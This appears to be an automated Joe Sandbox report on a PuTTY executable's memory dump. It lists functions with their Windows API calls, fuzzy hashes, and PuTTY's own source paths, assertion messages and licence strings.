                                                          • Instruction ID: 6a3604effc9e2fd60cd4f52149a80b1db5eb100c960f439446d24404d75b99e8
                                                          • Opcode Fuzzy Hash: 372bc13db1d882b2b296d98ef2a3135d5becb213e57101d97af90f41ed2a4930
                                                          • Instruction Fuzzy Hash: 7A41C1B3A09A03A6E710AB10E851779E390FBC5390F884331D94D877A4CF3EE546A728
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo
                                                          • String ID: MZx
                                                          • API String ID: 3215553584-2575928145
                                                          • Opcode ID: 6cc51e3ed7b752e8f09b28c0a0846ac8a3f82b3ca429e8163b0842fd606f671d
                                                          • Instruction ID: 9db5d4b5c7ed7e158ecbeb10b59abd30e0e4800c1be5b289c15be18cb84e786b
                                                          • Opcode Fuzzy Hash: 6cc51e3ed7b752e8f09b28c0a0846ac8a3f82b3ca429e8163b0842fd606f671d
                                                          • Instruction Fuzzy Hash: EF41A43390A78595E762AF31E85067DFBE4AB06B44F888032E6CC07746CE3E9415D32A
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: htonl
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/network.c$addr->addresses && step.curraddr < addr->naddresses$false && "bad address family in sk_addrcopy"$family != AF_UNSPEC
                                                          • API String ID: 2009864989-1075602240
                                                          • Opcode ID: 2e7a59c0b8d8703f1956a80c8c533f56134deb0ffb2b0e82dd4185afc88fa7dc
                                                          • Instruction ID: 5adcfb918708246b2b7e4dcc9fc5f95ea8298b49ac3e3f2371c329b6edbb3232
                                                          • Opcode Fuzzy Hash: 2e7a59c0b8d8703f1956a80c8c533f56134deb0ffb2b0e82dd4185afc88fa7dc
                                                          • Instruction Fuzzy Hash: 36217663A0A607E2FE30AB15D4819B4D3D0FF54744F984431CA4D47295DE3EE542E729
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ItemMessageSend
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX$c->ctrl->listbox.height != 0
                                                          • API String ID: 3015471070-502068358
                                                          • Opcode ID: a8bc93aff5f14b9ad480b50528ba427e3c2402bc3545210796070fefc6a6bd9d
                                                          • Instruction ID: 1246f0a43b2bb9e9267ca6040994aa23a1574e7498305eb397f5ff1670f97ac5
                                                          • Opcode Fuzzy Hash: a8bc93aff5f14b9ad480b50528ba427e3c2402bc3545210796070fefc6a6bd9d
                                                          • Instruction Fuzzy Hash: 6831C473B0A502A1FB60AB19E944B64E750EB847A8F894231CE0D07791DF3EE495E714
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: htonlinet_ntoa
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/network.c$<unknown>$addr->addresses && step.curraddr < addr->naddresses
                                                          • API String ID: 298042256-1369832353
                                                          • Opcode ID: ec09f110da0b110d43016520fb59be07aeaa37eb2a604bdbf79392e45f675bb9
                                                          • Instruction ID: 6b8ed966514e5f98a068722fe339c1a037ccc3eb88ff4bd8c66ef92e598b0493
                                                          • Opcode Fuzzy Hash: ec09f110da0b110d43016520fb59be07aeaa37eb2a604bdbf79392e45f675bb9
                                                          • Instruction Fuzzy Hash: 2221F5A3B09702A2FE20EB219850A78E390AF48BC4FD44135DD4D07794DE3EE502E729
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: FileView$CloseHandleUnmap
                                                          • String ID: %p:%u$Serialised configuration data was invalid
                                                          • API String ID: 2927507641-1340088990
                                                          • Opcode ID: 1f748e64f740fb363a683afb079e19648defc08c367bf72b76af7a6ecde7d6ae
                                                          • Instruction ID: bd36234ddbadb837d044651f4ca1b7c106425a62fb9a1bd810665b9978974da7
                                                          • Opcode Fuzzy Hash: 1f748e64f740fb363a683afb079e19648defc08c367bf72b76af7a6ecde7d6ae
                                                          • Instruction Fuzzy Hash: 17218333A0D64692EA51EB14F85076AE3A0EF85780F901031EA8E47F64DF7EE405DB14
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Caret$Window$BlinkCreateFlashProcShowTime
                                                          • String ID:
                                                          • API String ID: 3048652251-3916222277
                                                          • Opcode ID: 4688c87af7469075efd59302d809246c4db8de73df617baf4f989ec76de68786
                                                          • Instruction ID: 6081171ef79bed726d93ce6418ed42de94aaf5b623883857e91455c0a66d08ff
                                                          • Opcode Fuzzy Hash: 4688c87af7469075efd59302d809246c4db8de73df617baf4f989ec76de68786
                                                          • Instruction Fuzzy Hash: FC21BE73A0A68691E7A0EB11E458BEAF768EF88B94F840031DE4D43381DF7ED885D714
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$CheckItemMenu
                                                          • String ID: '
                                                          • API String ID: 1924917330-1997036262
                                                          • Opcode ID: c70aba2d3228059daeb953c4da53d826689c6e99a259729a0a59ee13740f572c
                                                          • Instruction ID: 2444e6078d7cafaae217c768cda705834d9bc4c930572ff10bccbe7c11555ee1
                                                          • Opcode Fuzzy Hash: c70aba2d3228059daeb953c4da53d826689c6e99a259729a0a59ee13740f572c
                                                          • Instruction Fuzzy Hash: 1711E26771465042E7A0AB3AE450B2AB321EBC97B4F504231DE6E83BC4CF3DD4418710
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: ErrorFileLast$CreateDelete
                                                          • String ID: Unable to delete '%s': %s
                                                          • API String ID: 3657518308-26304762
                                                          • Opcode ID: a2eeb90ef7a25348029317c67a1c057a214783dd391cde8fcbebd317eaf38799
                                                          • Instruction ID: 4f378afa3ad26f8aa543fb59f1f23da2fc1a4372c1d07310bc1e596a38fc1b0e
                                                          • Opcode Fuzzy Hash: a2eeb90ef7a25348029317c67a1c057a214783dd391cde8fcbebd317eaf38799
                                                          • Instruction Fuzzy Hash: 20110832B0860352E7507B74A90577EE291AF817B0F944334DA7E83BD4DF3E9941A214
                                                          APIs
                                                          Strings
                                                          • %s Licence, xrefs: 00007FF738A53F35
                                                          • PuTTY is copyright 1997-2024 Simon Tatham.Portions copyright Robert de Bath, Joris van Rantwijk, Delian Delchev, Andreas Schultz, Jeroen Massar, Wez Furlong, Nicolas Barry, Justin Bradford, Ben Harris, Malcolm Smith, Ahmad Khalifa, Markus Kuhn, Colin Watso, xrefs: 00007FF738A53F58
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: Text$DialogItemWindow
                                                          • String ID: %s Licence$PuTTY is copyright 1997-2024 Simon Tatham.Portions copyright Robert de Bath, Joris van Rantwijk, Delian Delchev, Andreas Schultz, Jeroen Massar, Wez Furlong, Nicolas Barry, Justin Bradford, Ben Harris, Malcolm Smith, Ahmad Khalifa, Markus Kuhn, Colin Watso
                                                          • API String ID: 4005798191-2223775202
                                                          • Opcode ID: 7e772465715b6861d82dd0f3126e1edd586c9725a81e8e41a119e01165285756
                                                          • Instruction ID: 33aed625facdfb40a9dec80932efa96b1702de62985c3fe740c529e2e3fa482f
                                                          • Opcode Fuzzy Hash: 7e772465715b6861d82dd0f3126e1edd586c9725a81e8e41a119e01165285756
                                                          • Instruction Fuzzy Hash: 2FF0D652F0950371FA547711E9505BCD2519FC6BE1FD44231C80D0A6D4CDBFA8C6622A
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 499c76965b417b22128af7ddef85adb1e7ea0c984cb2071aab4f6688d3a38bd2
                                                          • Instruction ID: b87695d0c333aca19951b62e24b887f9f604575997df679741206c6580a203fc
                                                          • Opcode Fuzzy Hash: 499c76965b417b22128af7ddef85adb1e7ea0c984cb2071aab4f6688d3a38bd2
                                                          • Instruction Fuzzy Hash: F2F04463A09A0351EA10AB14E855739F360EF49761FD40735C96E451E4CF3ED4499325
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: CurrentDirectory$FileName$OpenSave
                                                          • String ID:
                                                          • API String ID: 3193246104-0
                                                          • Opcode ID: 9cce9c2bc3f64e597b8f825aad0441e26ad99805dbc91df4869bb55238ec2463
                                                          • Instruction ID: 0d25e235dfe747ad0245266b07d01d73ae2ee99a7c9e1f352d6cfbbd2e2f9178
                                                          • Opcode Fuzzy Hash: 9cce9c2bc3f64e597b8f825aad0441e26ad99805dbc91df4869bb55238ec2463
                                                          • Instruction Fuzzy Hash: F921DA63A0FA4252F7606B24E85477AF7A0AF44750FC40230CA8D467D4EF3DEA45E229
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: ObjectSelect$CreateLineMove
                                                          • String ID:
                                                          • API String ID: 2487549907-0
                                                          • Opcode ID: df965a00611e6bfc58505ae8152eb4b93f348e5a6ca257b903e09cf8ba18f58a
                                                          • Instruction ID: d636975ed70ea473ccdfe44ad1c663cbb232ff6e90079cc118b6d313937d0e73
                                                          • Opcode Fuzzy Hash: df965a00611e6bfc58505ae8152eb4b93f348e5a6ca257b903e09cf8ba18f58a
                                                          • Instruction Fuzzy Hash: 4111D337F0950287DB21DB26F800469E3A1EBC9FA0B448130CE1D43B44CE3DF8839614
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: CriticalSection$CloseEnterHandleLeave
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/handle-io.c$h && !h->u.g.moribund
                                                          • API String ID: 2394387412-953404032
                                                          • Opcode ID: 3e9f72159a42e223d6897d1c2fcd9aa8dd0c75e0c0728062b09b89a3d4e74f60
                                                          • Instruction ID: c0e1e288bb91729c05049428efac63d82c11d8ab19b0063dfbbee7cf8d7e3f49
                                                          • Opcode Fuzzy Hash: 3e9f72159a42e223d6897d1c2fcd9aa8dd0c75e0c0728062b09b89a3d4e74f60
                                                          • Instruction Fuzzy Hash: 1621B667A09642A2EB32AB15F44027AF760EB48754F840131CBCE02B90DF3EE485D359
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: c145aa9e71664b9ceaba139238ef165581b66b7f91f37de1a0b6c3f0234b5bc0
                                                          • Instruction ID: d7632463577a63358ea46175f0a660b3efb2a9845b06bf8e2198821d410740f9
                                                          • Opcode Fuzzy Hash: c145aa9e71664b9ceaba139238ef165581b66b7f91f37de1a0b6c3f0234b5bc0
                                                          • Instruction Fuzzy Hash: 2011B223E58B1363F6543224D949379C0426F55764F940630EB7E4F6FECE3EA880612E
                                                          APIs
                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF738B0320F,?,?,00000000,00007FF738B03122,?,?,?,?,?,00007FF738AED1BA), ref: 00007FF738B01C27
                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF738B0320F,?,?,00000000,00007FF738B03122,?,?,?,?,?,00007FF738AED1BA), ref: 00007FF738B01C46
                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF738B0320F,?,?,00000000,00007FF738B03122,?,?,?,?,?,00007FF738AED1BA), ref: 00007FF738B01C6E
                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF738B0320F,?,?,00000000,00007FF738B03122,?,?,?,?,?,00007FF738AED1BA), ref: 00007FF738B01C7F
                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF738B0320F,?,?,00000000,00007FF738B03122,?,?,?,?,?,00007FF738AED1BA), ref: 00007FF738B01C90
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: c8caefee1c78adc6cc2a832ec0a8ff3792627e9dc09bb3095b918bdbd87bd148
                                                          • Instruction ID: 79032135e741e6d16a2f901578e17f3227b7924b5eb82f547376134e0214f5b0
                                                          • Opcode Fuzzy Hash: c8caefee1c78adc6cc2a832ec0a8ff3792627e9dc09bb3095b918bdbd87bd148
                                                          • Instruction Fuzzy Hash: 5A11AFA2E0C20361FA6CB321565197DE1429F443A0FD44734E43D4A7E6DF7EE88A622F
                                                          APIs
                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01AAD
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01ACC
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01AF4
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01B05
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01B16
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: 6bf687c1edb8c7d0d239e61b0dd02aac6f82c614fe3eb266b0f273a4c800701b
                                                          • Instruction ID: f8be295a3c0398053e8848b328bd5da274b5b91dfdfe71e4e934b6398e739029
                                                          • Opcode Fuzzy Hash: 6bf687c1edb8c7d0d239e61b0dd02aac6f82c614fe3eb266b0f273a4c800701b
                                                          • Instruction Fuzzy Hash: 86111CA2A0950761FA6CB261546297DD2464F41360FD80734E53D462E2EF3FB84A623B
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo
                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                          • API String ID: 3215553584-1196891531
                                                          • Opcode ID: 1be7b1efe40a33ba18a595fcdd4d053b0733aa869be65a09c6fe4d55339440b4
                                                          • Instruction ID: 2c66b819ebef2fa33cae9db9cc213e20c7cde0944d4e084fa59e784133ac93d0
                                                          • Opcode Fuzzy Hash: 1be7b1efe40a33ba18a595fcdd4d053b0733aa869be65a09c6fe4d55339440b4
                                                          • Instruction Fuzzy Hash: E781A2B3E18203A5F6656F258110A3EEAA0AF1174CFD58035CA2D57295DF3FB801B32B
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo
                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                          • API String ID: 3215553584-1196891531
                                                          • Opcode ID: e3481ef9aec6e78ed2a1b8eb5a6bb2e99a88962ad6cbc2fa58b633ec77e900ec
                                                          • Instruction ID: ee13fee261536d85787e4104c6e2733ad32dc493f98d1c56b4ce1bcb620fccf8
                                                          • Opcode Fuzzy Hash: e3481ef9aec6e78ed2a1b8eb5a6bb2e99a88962ad6cbc2fa58b633ec77e900ec
                                                          • Instruction Fuzzy Hash: 4281B5E3D0C203E5F6656A288554A7DEA909F11744FF4A831C53A826D5CB3FA809B72B
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: Window$Rect$MessageSend$ClientDesktopDialogIconLoadLongMoveShowText
                                                          • String ID: Main
                                                          • API String ID: 2039525433-521822810
                                                          • Opcode ID: 8c1771a4ca4f45391abdf4efa7b50b6c01b83754658402581b21757466e65035
                                                          • Instruction ID: 2049ae36507c82fdb2369bdfe5fa88f1b30cc27f00649a1b9545877827837c32
                                                          • Opcode Fuzzy Hash: 8c1771a4ca4f45391abdf4efa7b50b6c01b83754658402581b21757466e65035
                                                          • Instruction Fuzzy Hash: 0651F67370960262EB20BB12E450ABAE790EBC9BD4FC04235DE8D47B85DF7EE1419714
                                                          APIs
                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF738AD9843
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: %02x$CryptProtectMemory$crypt32.dll
                                                          • API String ID: 190572456-4241872374
                                                          • Opcode ID: d96700e70e03d59c02360c032b61d41d4cff819394462cb36d846765773851ff
                                                          • Instruction ID: d6a1172d64743d714ea9eedc10b8607649a9e3fd8208e8e53acbbd98c5f770f8
                                                          • Opcode Fuzzy Hash: d96700e70e03d59c02360c032b61d41d4cff819394462cb36d846765773851ff
                                                          • Instruction Fuzzy Hash: 26419E53F0E643A2FA10BB26E860779E391AF45BC0FC48031C94D57796DE3EE44AA325
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: _set_error_mode
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/utils/memory.c$Microsoft Visual C++ Runtime Library$extralen <= maxsize - oldlen
                                                          • API String ID: 1949149715-10101066
                                                          • Opcode ID: abf45a9388cfe587ab4a5c3f8130fcb99dc74afbfdbe66ab30136296657ee0b7
                                                          • Instruction ID: 6f9950364efab483cab89c514e9231d9ab1f65e7338d88827f87fb8b4bd8b98c
                                                          • Opcode Fuzzy Hash: abf45a9388cfe587ab4a5c3f8130fcb99dc74afbfdbe66ab30136296657ee0b7
                                                          • Instruction Fuzzy Hash: 98212D73B1E58295F720B712A840ABAE254EF44FC8FA44132EF4D47B99CE3DE5419718
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: BreakClearCloseCommHandle
                                                          • String ID: End of file reading from serial device$Error reading from serial device
                                                          • API String ID: 2685284230-2629609604
                                                          • Opcode ID: 272a985d1a52f2dda5794481ab6d1bdd34a2e60b04609d1b9940c24dc2b7c133
                                                          • Instruction ID: a82915bfdccd8da43919a2fca1795457dd0164cdccc74bac9c7b623bb9006910
                                                          • Opcode Fuzzy Hash: 272a985d1a52f2dda5794481ab6d1bdd34a2e60b04609d1b9940c24dc2b7c133
                                                          • Instruction Fuzzy Hash: D121A323A06A4691EA21BB16E44077AE760AB84BF0F844331CFAE07BD5DF3DE4419350
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: QueryValue$_set_error_mode
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/utils/registry.c$size < allocsize
                                                          • API String ID: 4156801415-3295803084
                                                          • Opcode ID: c9357b5cd9070ea9f28fd442f1c7bd38efce1c1879d53600b97b3029d582d436
                                                          • Instruction ID: 834085c1b99208ad136d51fc1c07dd55e12bdd16ffcde8a6048303ec8230ffc2
                                                          • Opcode Fuzzy Hash: c9357b5cd9070ea9f28fd442f1c7bd38efce1c1879d53600b97b3029d582d436
                                                          • Instruction Fuzzy Hash: 0E21BB33B2A51192F650DB55A400B6BF390FBC4B94FD55031FD8E47B45DE3ED8019A14
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: ButtonChecked
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$c && c->ctrl->type == CTRL_RADIO$false && "no radio button was checked"
                                                          • API String ID: 1719414920-994577671
                                                          • Opcode ID: 101e6a568da7f983d046a016e64fcc0f9b702adbbf1840bd19f6594f1160c4b9
                                                          • Instruction ID: 92bc5afb26d2489a534cf11d5c088dafe8974c4e67440e8fecd8f2e6cc0c7038
                                                          • Opcode Fuzzy Hash: 101e6a568da7f983d046a016e64fcc0f9b702adbbf1840bd19f6594f1160c4b9
                                                          • Instruction Fuzzy Hash: FD217473B0650AA5E610AB46E8816A5E760FB44B94FC48135DF4D47391EE3FE885E324
                                                          APIs
                                                            • Part of subcall function 00007FF738AFAA84: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF738AEBB86,?,?,?,00007FF738AEBBA7,?,?,?,00007FF738AED05E), ref: 00007FF738AFAAAA
                                                          • GetDC.USER32 ref: 00007FF738A37D65
                                                          • SelectPalette.GDI32 ref: 00007FF738A37D80
                                                            • Part of subcall function 00007FF738AFA0EC: _set_error_mode.LIBCMT ref: 00007FF738AFA113
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: FeaturePalettePresentProcessorSelect_set_error_mode
                                                          • String ID: !wgs->wintw_hdc$/home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/window.c
                                                          • API String ID: 1342517984-1893345581
                                                          • Opcode ID: 899692d88e7cdc047586990661a6e2ecb4244797324f979e38a2282d2660edc1
                                                          • Instruction ID: 3601f168858adf32db3cec2995819d6ca05d10d1674e5e72cb4acd51a432e29b
                                                          • Opcode Fuzzy Hash: 899692d88e7cdc047586990661a6e2ecb4244797324f979e38a2282d2660edc1
                                                          • Instruction Fuzzy Hash: E6F0F423A06113A2FA187726F845BB9D361EF40BC0F944130C91D06A80CF7FB442EB28
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: AsyncErrorLastSelect_set_error_mode
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/select-gui.c$winsel_hwnd
                                                          • API String ID: 3444122918-3835285417
                                                          • Opcode ID: 055cab730dbf00f3a9b4e8936b7f9efbc5cb510023e8262056d438244291121d
                                                          • Instruction ID: 982e23dfbdfc8630f341ee337e727b70ba77274e2c13fefb2cf10a2e0f41e849
                                                          • Opcode Fuzzy Hash: 055cab730dbf00f3a9b4e8936b7f9efbc5cb510023e8262056d438244291121d
                                                          • Instruction Fuzzy Hash: D0F0D1A3B0911361FA552B6AB8819B5C2919B48BA0F945230CD1C43290EE3EA8C6A728
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: ClientDesktopInfoMonitorRectWindow
                                                          • String ID: (
                                                          • API String ID: 2130016935-3887548279
                                                          • Opcode ID: a1505dc74beb0b5e4bfb1d5a67904c8bd33e14f96849789e4f377d1c5e223afe
                                                          • Instruction ID: 813926990e6a7fd4a5f7dee40539429ea34ab2e8f896e0a4d63658d500b25564
                                                          • Opcode Fuzzy Hash: a1505dc74beb0b5e4bfb1d5a67904c8bd33e14f96849789e4f377d1c5e223afe
                                                          • Instruction Fuzzy Hash: 86012862A0DB4692FB50AB60F844329E3A0EF49B54F844234DC4D03350DE7DE48AE714
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: CommErrorLast$StateTimeouts
                                                          • String ID: Configuring %s flow control$RTS/CTS
                                                          • API String ID: 274883806-1158513486
                                                          • Opcode ID: 17da3ac95dc485c31095cd83b692304d4457b7ceb00bde3eaf2e0a7f5a05ef5d
                                                          • Instruction ID: 656f02821fc5cef76929a9ad3d9e6064e9d7397b219ef4260cef4fa221d468eb
                                                          • Opcode Fuzzy Hash: 17da3ac95dc485c31095cd83b692304d4457b7ceb00bde3eaf2e0a7f5a05ef5d
                                                          • Instruction Fuzzy Hash: EC01F763E0D603A2FA21EB25E440569F360FF85780FD04231DB4D46A98DF7EE681EB24
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: CommErrorLast$StateTimeouts
                                                          • String ID: Configuring %s flow control$DSR/DTR
                                                          • API String ID: 274883806-321787297
                                                          • Opcode ID: 098ddfec7f8e469a14d23c8d1d90f908f6ef54a0b73336e8a1759b2a333cb857
                                                          • Instruction ID: 7b83539079477e021a985b5f9782cd98fdbca4b58dc8a5d50e98b03cf1725a43
                                                          • Opcode Fuzzy Hash: 098ddfec7f8e469a14d23c8d1d90f908f6ef54a0b73336e8a1759b2a333cb857
                                                          • Instruction Fuzzy Hash: A201F723A0D60352EA21EB25E44016AF320EF89780FC04231DA4D46A98DE7DE681EB14
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
